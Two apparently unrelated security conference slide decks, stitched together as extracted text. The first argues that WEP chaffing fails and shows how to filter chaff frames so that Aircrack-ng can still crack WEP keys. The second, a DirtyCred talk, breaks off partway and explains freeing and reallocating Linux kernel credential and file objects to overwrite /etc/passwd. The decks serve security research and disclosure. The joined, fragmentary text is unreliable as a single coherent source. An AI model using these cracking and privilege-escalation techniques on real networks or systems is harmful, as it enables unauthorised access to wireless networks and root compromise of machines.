Suppress weak IV generation
ARP filtering
The Latest Development
OR
Is chaffing approach yet another
band-aid which cannot hold
water?
Can chaffing approach indeed hide
all WEP cracks?
WEP Chaff frame insertion
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
What is WEP Chaffing?
WEP Chaffing is a technique of
mixing spoofed WEP encrypted
frames a.k.a. “Chaff” which are
indistinguishable from the
legitimate frames. This
confuses the statistical analysis
of WEP cracking tools
The current versions of WEP
key cracking tools such as
Aircrack-ng and AirSnort will
either produce wrong results or
won’t converge on the WEP key
in presence of WEP Chaffing
WEP
Data
Chaff
Aircrack-ng
Fails!!!
What are Chaff packets?
Chaff packets are spoofed WEP
encrypted packets which try to
mislead the decision making
process of cracking tools.
In reality, not all WEP
encrypted packets qualify as
Chaff; Only those which satisfy
any one of the FMS or Korek
conditions can cause a bias in
the cracking logic.
The WEP Chaffing process will
craft the IV and the first two
encrypted bytes of the Chaff
packet to make it satisfy an
FMS or Korek condition.
WEP
Data
Chaff
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
WEP Chaffing Example
(Demo)
Why does this work?
Current generation of WEP cracking tools “trust” all data
seen over the air
WEP Chaffing exploits this trust and spoofs garbage
data into the air
This data is blindly used in the statistical analysis for
calculating the WEP key – causing either a wrong / no
result
WEP crackers such as Aircrack-ng, Airsnort etc thus fail
to crack the key in presence of Chaffing
As, Aircrack-ng is the most reliable WEP cracker
currently available which implements all the known
statistical attacks till date. We decided to use Aircrack-
ng 0.7 version as a benchmark to run our tests
Let us now try and understand the key cracking
process in Aircrack-ng (0.7 version)
AirCrack-ng Review – the Cracking Logic
Init:
Preprocess the input packet trace & store a list unique IVs and first two encrypted bytes;
ignore duplicates
Iteration:
To crack the Bth byte of the key assume the first (B-1) bytes of the secret key have
already been cracked. Start with B=0.
To crack byte B of the secret key
Simulate the first B+3 steps of RC4 KSA
Find the next weak IV (matching any Korek condition) which leaks information
about byte B of the secret WEP key; For the above IV
•
Compute a probable value for key byte B based on which Korek condition
matched
•
Award a score (vote) for the above guess
After all unique IVs are processed,
•
Calculate weighted score for each possibility
•
The most probable value of secret byte B is = value with the highest score
Use the fudge factor to determine number of possibilities to use for bruteforce for
each byte. By default fudge factor is 5 for 40 bit key and 2 for 104 bit key.
Crack the last key byte using brute force; Verify against 32 IVs from the list of IVs if
the key is right
AirCrack-ng – Possible Attack Points
Init:
Preprocess the input packet trace & store a list unique IVs and first two encrypted bytes;
ignore duplicates
Iteration:
To crack the Bth byte of the key assume the first (B-1) bytes of the secret key have
already been cracked. Start with B=0.
To crack byte B of the secret key
Simulate the first B+3 steps of RC4 KSA
Find the next weak IV (matching any Korek condition) which leaks information
about byte B of the secret WEP key; For the above IV
•
Compute a probable value for key byte B based on which Korek condition
matched
•
Award a score (vote) for the above guess
After all unique IVs are processed,
•
Calculate weighted score for each possibility
•
The most probable value of secret byte B is = value with the highest score
Use the fudge factor to determine number of possibilities to use for bruteforce for
each byte. By default fudge factor is 5 for 40 bit key and 2 for 104 bit key.
Crack the last key byte using brute force; Verify against 32 IVs from the list of IVs if
the key is right
Attack points
(1)
(2)
(3)
(4)
Attacking AirCrack-ng
Attack point (1) “Eliminate legit IVs”: If chaffer’s packet
containing weak IV is seen before a legit packet with the same
IV, legit packets with weak IVs will be ignored by AirCrack.
Attack point (2) “Influence voting logic”: Chaffer can inject
packets with weak IVs matching Korek conditions and in turn
influence the voting logic.
Attack point (3) “Beat Fudging”: Maximum fudge factor
allowed is 32. Hence the Chaffer can easily create a bias such
that the legit key byte is never included for brute forcing.
Attack point (4) “Beat the verification step”: After a key is
cracked, it is verified against a selected subset of IVs and first
two encrypted bytes in the packet. If this set contains chaff,
Aircrack-ng will exit with failure.
So, can AirCrack-ng be made ‘Smarter’?
Aircrack-ng “trusts” what
it sees. It does not and in
its current form cannot
differentiate between the
Chaffer’s WEP packets
(noise) and the
Authorized networks WEP
packets (signal).
Could we teach Aircrack-
ng to separate the
“Chaff” a.k.a. Noise from
the “Grain” a.k.a. Signal?
Lets now look at various
techniques to beat WEP
Chaffing
WEP
Data
Chaff
Aircrack-ng
Succeeds!!!
Filter
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
Chaff Insertion Approaches
Naive
Sophisticated
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Necklace
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Off goes the
necklace
Aircrack-ng
Default
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Crown
Aircrack-ng
Default
Weak IV frames
of fixed size
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Missing
Something?
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Robe
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Off goes your
robe!! ☺
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Quick review - AirCrack-ng with a normal trace file
Traffic Characteristics
TCP based file download using WEP key “g7r0q”
Approx. 1 GB of the traffic collected in a packet trace
About 300,000 Unique IVs present in the trace
6,958 Weak IVs were used to crack the key.
AirCrack-ng is able to crack the WEP Key using the above trace
Note that the maximum vote (bias) is in the range of 47 to 148
Our observation
Max vote for any cracked key byte is typically less than 250 in a
“normal” trace of ~300,000 packets
Basic Idea
Pattern of votes caused by chaff packets is visibly different
than naturally occurring voting distribution
At each step of byte cracking, anomalous voting pattern can
be identified and the corresponding guess can be eliminated
Simple Aircrack-ng Modification
While cracking a key byte, compute votes and display on
screen.
Take user’s input on which value to choose for that key
byte
User can visually inspect the votes and remove
any “obviously wrong” guesses
Aircrack-ng uses the user’s choice as the
“guessed byte” for that byte of the key.
Visual Inspection using Aircrack-ng
Guiding Aircrack-ng with Manual
Inputs: Chaff with single key
Demo
Guiding Aircrack-ng with Manual Inputs:
Analysis
Strengths
Can crack the key in many cases
• Single chaff key
• Multiple chaff keys
Weaknesses
May not work in presence of a chaffer
with random keys
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
I like that
sword ;-)
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Thanks!
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Seq# Vs Time graph
Example Illustrating Sequence Filter Implementation (using a
subset of packets from the trace)
Sequence number is a part of the MAC header and is present
in all Management and Data packets.
It is important to note the distinct pattern of sequence
numbers for different sources
This pattern can be used as a filter
Most MAC spoofing detection algorithms already use
Sequence#
Sequence Filter
0
500
1000
1500
2000
2500
0
200
400
600
800
1000
1200
Packet Number
MAC Sequence Number
Legitimate-Client-Seq
Chaffer-Seq-Num
Just a few hours before we submitted this presentation, we came across Joshua Wright’s blog in
which he countered WEP Cloaking advocating the same technique (sequence number + IV based
filtering). This submission will demonstrate the tool whose development Joshua predicted.
http://edge.arubanetworks.com/blog/2007/04/airdefense-perpetuates-flawed-protocols
Few lines of pseudo-code illustrating
sequence filter!
For all packets of a given device in the trace:
Prev_seq_num = First Sequence number seen for device;
If (current_seq_num – prev_seq_num < threshold)
{
prev_seq_num = current_seq_num;
consider packet for key cracking
} else {
Discard packet
}
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Shoes
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Poof!
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
WEP IV vs Time Graph
Example Illustrating WEP IV Filter Implementation (using a
subset of packets from the trace)
Note the distinct pattern in IV progression for different
devices
Legacy devices which WEP Chaffing desires to protect have
Sequential IVs
IV pattern can thus be used as a filter
IV Filter
1
10
100
1000
10000
100000
1000000
10000000
100000000
0
200
400
600
800
1000
1200
Packet Number
WEP IV (Logarithmic
Scale)
Legitimate-IV
Chaffer-IV
Just a few hours before we submitted this presentation, we came across Joshua Wright’s blog in
which he countered WEP Cloaking advocating the same technique (sequence number + IV based
filtering). This submission will demonstrate the tool whose development Joshua predicted.
http://edge.arubanetworks.com/blog/2007/04/airdefense-perpetuates-flawed-protocols
Few lines of pseudo-code illustrating IV
filter!
For all packets of a given device in the trace:
Prev_wep_iv = First WEP IV seen for device;
If (current_wep_iv – prev_wep_iv < threshold)
{
prev_wep_iv = current_wep_iv;
consider packet for key cracking
} else {
Discard packet
}
Sequence Number and IV based
Chaff filtering
(Demo)
Separating Chaff using Sequence No and IV
: Analysis of this technique
Strengths
Works with all 3 kinds of chaff discussed – chaffer
with single key, multiple keys and random keys
Passive, off-line method
Combination of sequence number and IV analyses
creates a very robust filter
An independent chaff separator can be built
Weakness
Reduced filtering efficiency when IVs are generated
randomly. (The good news is that most legacy WEP
devices for which WEP Chaffing is recommended
don’t seem to use random IVs)
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Pants ☺
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
Frames indistinguishable
from AP Seq# & IV sequence
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Down they
come!
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
Frames indistinguishable
from AP Seq# & IV sequence
Active Frame
replay
Chaff Separation using Active Frame Replay
Basic Idea
WEP has no replay protection
Header of WEP frames can be modified
Upon receiving a correctly encrypted WEP frame, the receiver will
forward the frame as directed by its header
Upon receiving an incorrectly encrypted WEP frame, the receiver will
drop the packet
Idea inspired from chopchop tool by Korek.
Building a practical Frame Re-player
Pick a frame whose authenticity is to be verified
Change destination address to ff:ff:ff:ff:ff:ff or a chosen Multicast
address and transmit
If the AP relays the broadcast frame – the frame is authentic
If AP drops the frame – it is a chaff frame
Replay packets can be identified by looking at the transmitter address
(addr3) of packets transmitted by AP
Optionally, a signature can be added to identify the replay packets (e.g.,
specific multicast as destination)
The packet size is another parameter which can be used to identify the
replayed packet
100% chaff separation is possible
Chaff Separating using Active Frame Replay
Successful Key Cracking
The corrupted trace was filtered using Active replay
technique and a new filtered trace was created.
Aircrack-ng is able to crack the filtered trace after the
application of packet replay filter
Separating Chaff using Active Frame Replay
Strengths
Get a bonus packet for every packet we send
Works with all 3 kinds of chaff discussed – chaffer with
single key, multiple keys and random keys
100% accurate chaff separation
Oblivious to the sequence number or IV progression
of a device
Can be done in real-time
Frame replay tools already available in public domain
Weakness
WEP cracker cannot be totally passive; Active frame
injection required
This has to be done “online” and at least one client
needs to be associated with the network, whose
source MAC we can forge and use for packet replays
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Shirt
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
Frames indistinguishable
from AP Seq# & IV sequence
Active Frame
replay
Using Super
secret magic
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Ooops!
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
Frames indistinguishable
from AP Seq# & IV sequence
Active Frame
replay
Using Super
secret magic
Replay &
Fingerprinting
Chaff
Replay & Fingerprinting Chaff
Implementation of chaffing dictates that there will be an
identifiable fingerprint in the Chaff
This is because the WIPS needs to identify its own Chaff
packets from the real network data
Finding a usable fingerprint is a one time job
Check packet header fields for any abnormality
Packet is fixed length?
Something appended, pre-pended to the packet?
…many more possibilities
Once found, simply write a filter to weed out all the
Chaff, then release the fingerprint to the community
Chaff Insertion Approaches
Naive
Inject random
frames
Sophisticated
Anyone for a
Full Monty??
Aircrack-ng
Default
Weak IV frames
of fixed size
Frame Size
Filter
Chaff using
single key
Aircrack-ng
Visual
Inspection
Chaff using
multiple keys
Sequence
Number
analysis
Chaff using
random keys
Initialization
Vector
analysis
Frames indistinguishable
from AP Seq# & IV sequence
Active Frame
replay
Using Super
secret magic
Replay &
Fingerprinting
Chaff
Overlapping Countermeasures
Aircrack-ng
Default
Frame Size
Filter
Aircrack-ng
Visual
Inspection
Sequence
Number
Analysis
IV
Analysis
Active
Frame
Replay
Finger-
printing
Chaff
Random
Frames
Weak IV
frames of
fixed size
Chaff using
single key
Chaff using
multiple
keys
Chaff using
random
keys
Indistinguish-
able Seq#
and IV in AP
Super Secret
Magic potion
Counter
Types of
Chaff
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
Implementation problems with Chaffing
Now, we mention several implementation issues which
indicate that it may be highly impractical to have a scalable
Chaffing solution :
Passive key cracking tools cannot be detected
Chaffing needs to be done 24x7x365
Chaffing needs to be done on all channels on which WEP
devices operate.
Imagine the load on the WIPS and the bandwidth
wasted.
Chaffing needs to be done for all APs and Clients
connected to the authorized network.
Achieving a reliable confusion for the attacker
requires continual generation of chaff frames
Difficult (almost impossible) to achieve the above unless
dedicated devices are installed for Chaffing on each channel
Implementation issues …
Chaffer has to spend significantly high resources to win
all the time. If chaffing stops even for a brief period, the
attacker might crack the key.
Chaffer has to win always, Attacker has to win
only once.
Increasing sophistication of attack on Chaffing is
possible; attacker can go off-line; take a lot of time, try
a gamut of techniques and possibilities to break the key
Increasing sophistication of chaffing is more difficult; it
has be done continuously, as newer countermeasures
are discovered
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
Final Verdict …
Even if Chaff
frames were
made
indistinguishable
by an oracle,
WEP can still be
cracked.
WEP has so
many other
vulnerabilities
which can be
easily exploited!
128-bit key
Suppress weak IV generation
ARP filtering
WEP Chaff frame insertion
Final Verdict: WEP Chaffing was indeed too
good to be true …
WEP Chaffing can at best slow down a Cracker by a couple of
minutes but cannot stop him from breaking the key.
Though our talk only includes Aircrack-ng, the chaff
separation techniques we have outlined can be easily added
to the functionality of any WEP cracking tool, without much
additional work
Chaffing is another attempt of providing security through
obscurity
Chaffing cannot provide a robust protection against WEP key
cracking. WEP was broken …. it is broken ….it will
remain broken. PERIOD .
Open Challenge!!
If you believe you have a WEP Chaffing implementation
which works very differently and is unbeatable, then we
request you send it to us and we will break it within 72
hours
Demo Setup:
We will provide you an AP and clients – you can bring
the WEP Chaffer to protect them
Client
Client
AP
Chaffer
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
Questions?
References (1)
Vendor aims to ‘cloak’ WEP
http://www.networkworld.com/news/2007/032907-air-
defense-wep-wireless-devices.html?page=1
The TJX breach using Wireless
http://www.emailthis.clickability.com/et/emailThis?clickMap=v
iewThis&etMailToID=2131419424
RC4 stream Cipher basics
http://en.wikipedia.org/wiki/RC4
Wired Equivalent Privacy (WEP)
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
Weaknesses in the Key Scheduling Algorithm of RC4, Selected
Areas in Cryptography, 2001 - Fluhrer, Mantin and Shamir
http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ks
a.ps
Korek’s post on Netstumbler
http://www.netstumbler.org/showpost.php?p=89036
WEP Dead Again: Part 1 – Infocus, Securityfocus.com
http://www.securityfocus.com/infocus/1814
WEP Dead Again: Part 2 – Infocus, Securityfocus.com
http://www.securityfocus.com/infocus/1824
References (2)
Aircrack-ng : WEP Cracker
http://www.aircrack-ng.org/
Airsnort : WEP Cracker
http://airsnort.shmoo.com/
Pcap2air : Packet replay tool
http://www.802.11mercenary.net/pcap2air/
Chop-Chop : Packet decoder using WEP ICV flaw
http://www.netstumbler.org/showthread.php?t=12489
Intercepting Mobile Communications: The Insecurity of 802.11 –
N.Borisov
http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf
Your 802.11 Wireless Network has No Clothes – William Arbaugh
http://www.cs.umd.edu/~waa/wireless.pdf
Detecting Detectors: Layer 2 Wireless Intrusion Analysis – Joshua
Wright
http://home.jwu.edu/jwright/papers/l2-wlan-ids.pdf
Detecting WLAN MAC address spoofing – Joshua Wright
http://home.jwu.edu/jwright/papers/wlan-mac-spoof.pdf
WPA/WPA2 the replacement for WEP
http://en.wikipedia.org/wiki/WPA2
AirDefense Perpetuates Flawed Protocols – Joshua Wright
http://edge.arubanetworks.com/blog/2007/04/airdefense-
perpetuates-flawed-protocols | pdf |
Cautious! A New Exploitation Method!
No Pipe but as Nasty as Dirty Pipe
#BHUSA @BlackHatEvents
Zhenpeng Lin, Yuhang Wu, Xinyu Xing
Northwestern University
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Who Are We
Zhenpeng Lin
PhD Student
zplin.me
Xinyu Xing
Associate Professor
xinyuxing.org
Yuhang Wu
PhD Student
yuhangw.blog
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Recap About Dirty Pipe
• CVE-2022-0847
• An uninitialized bug in Linux kernel’s pipe subsystem
• Affected kernel v5.8 and higher
• Data-only, no effective exploitation mitigation
• Overwrite any files with read permission
• Demonstrated LPE on Android
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
What We Learned
• Data-only is powerful
• Universal exploit
• Bypass CFI (enabled in Android kernel)
• New mitigation required
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
What We Learned
• Data-only is powerful
• Universal exploit
• Bypass CFI (enabled in Android kernel)
• New mitigation required
• Dirty Pipe is not perfect
• Cannot actively escape from container
• Not a generic exploitation method
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Introducing DirtyCred
• High-level idea
• Swapping Linux kernel Credentials
• Advantages
• A generic exploitation method, simple and effective
• Write a data-only, universal (i.e., Dirty-Pipe-liked) exploit
• Actively escape from container
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Comparison with Dirty Pipe
• A generic exploitation method?
• Write a data-only, universal exploit?
• Attack with CFI enabled (on Android)?
• Actively escape from container?
• Threat still exists?
Dirty Pipe
DirtyCred
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Kernel Credential
• Properties that carry privilege information in kernel
• Defined in kernel documentation
• Representation of privilege and capability
• Two main types: task credentials and open file credentials
• Security checks act on credential objects
Source: https://www.kernel.org/doc/Documentation/security/credentials.txt
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• Struct cred in kernel’s implementation
Task Credential
un-
privileged
un-
privileged
freed
struct cred on kernel heap
freed
freed
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
freed
• Struct cred in kernel’s implementation
Task Credential
un-
privileged
un-
privileged
un-
privileged
freed
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
freed
• Struct cred in kernel’s implementation
Task Credential
un-
privileged
un-
privileged
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Struct file in kernel’s implementation
Freed
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Struct file in kernel’s implementation
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
int fd = open(“~/dummy”, O_RDWR);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
~/dummy
Open File Credentials
• Struct file in kernel’s implementation
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
int fd = open(“~/dummy”, O_RDWR);
struct file on kernel heap
f_cred
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Kernel checks permission on the file object when accessing
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
struct file on kernel heap
check perm
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Write content to file on disk if permission is granted
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
Write to disk
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Write denied if the file is opened read-only
~/dummy
f_mode
O_RDONLY
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDONLY);
write(fd, “HACKED”, 6);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Open File Credentials
• Write denied if the file is opened read-only
~/dummy
f_mode
O_RDONLY
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDONLY);
write(fd, “HACKED”, 6);
Failed write to
disk
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
DirtyCred: Swapping Linux Kernel Credentials
High-level idea
• Swapping unprivileged credentials with privileged ones
Two-Path attacks
• Attacking task credentials (struct cred)
• Attacking open file credentials (struct file)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
DirtyCred: Swapping Linux Kernel Credentials
Two-Path attacks
• Attacking task credentials (struct cred)
• Attacking open file credentials (struct file)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Task Credentials
un-
privileged
un-
privileged
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 1. Free a unprivileged credential with the vulnerability
Attacking Task Credentials
un-
privileged
un-
privileged
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 1. Free a unprivileged credential with the vulnerability
Attacking Task Credentials
un-
privileged
freed
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 2. Allocate privileged credentials in the freed memory slot
Attacking Task Credentials
un-
privileged
freed
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 2. Allocate privileged credentials in the freed memory slot
Attacking Task Credentials
un-
privileged privileged
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 3. Operate as privileged user
Attacking Task Credentials
un-
privileged privileged
un-
privileged privileged
freed
struct cred on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
DirtyCred: Swapping Linux Kernel Credentials
Two-Path attacks
• Attacking task credentials (struct cred)
• Attacking open file credentials (struct file)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Open File Credentials
• Write content to file on disk if permission is granted
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Open File Credentials
Step 1. Free file obj after checks, but before writing to disk
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Open File Credentials
Step 1. Free file obj after checks, but before writing to disk
~/dummy
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
check perm
freed
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Open File Credentials
Step 2. Allocate a read-only file obj in the freed memory slot
/etc/
passwd
f_mode
O_RDWR
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
freed
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
check perm
open(“/etc/passwd”, O_RDONLY);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Attacking Open File Credentials
Step 2. Allocate a read-only file obj in the freed memory slot
/etc/
passwd
f_mode
O_RDONLY
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
open(“/etc/passwd”, O_RDONLY);
check perm
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Step 3. Operate as privileged user — Writing content to the file
Attacking Open File Credentials
/etc/
passwd
f_mode
O_RDONLY
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
f_op
f_cred
~/dummy
f_op
f_cred
f_mode
O_RDWR
~/dummy
f_op
f_cred
f_mode
O_RDWR
Write to /etc/
passwd on disk
check perm
open(“/etc/passwd”, O_RDONLY);
struct file on kernel heap
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
DirtyCred: Swapping Linux Kernel Credentials
Three Steps:
1. Free an inuse unprivileged credential with the vulnerability
2. Allocate privileged credentials in the freed memory slot
3. Operate as privileged user
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Three Challenges
1. How to free credentials.
2. How to allocate privileged credentials as unprivileged users.
(attacking task credentials)
3. How to stabilize file exploitation. (attacking open file
credentials)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 1: Free Credentials
• Both cred and file object are in dedicated caches
• Most vulnerabilities happens in generic caches
• Most vulnerabilities may not have free capability
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 1: Free In-use Credentials Invalidly
• Solution: Pivoting Vulnerability Capability
• Pivoting Invalid-Write (e.g., OOB & UAF write)
• Pivoting Invalid-Free (e.g., Double-Free)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Write
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• Leverage victim objects with a reference to credentials
Pivoting Invalid-Write
victim
object
credential
object
credential
object
credential
object
*cred
0xff…000
0xff…100
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• Manipulate the memory layout to put the cred in the overwrite
region
vuln
object
victim
object
*cred
Pivoting Invalid-Write
victim
object
credential
object
credential
object
credential
object
*cred
0xff…000
0xff…100
overflow
object
credential
object
credential
object
credential
object
0xff…000
0xff…100
For OOB
For UAF
#BHUSA @BlackHatEvents
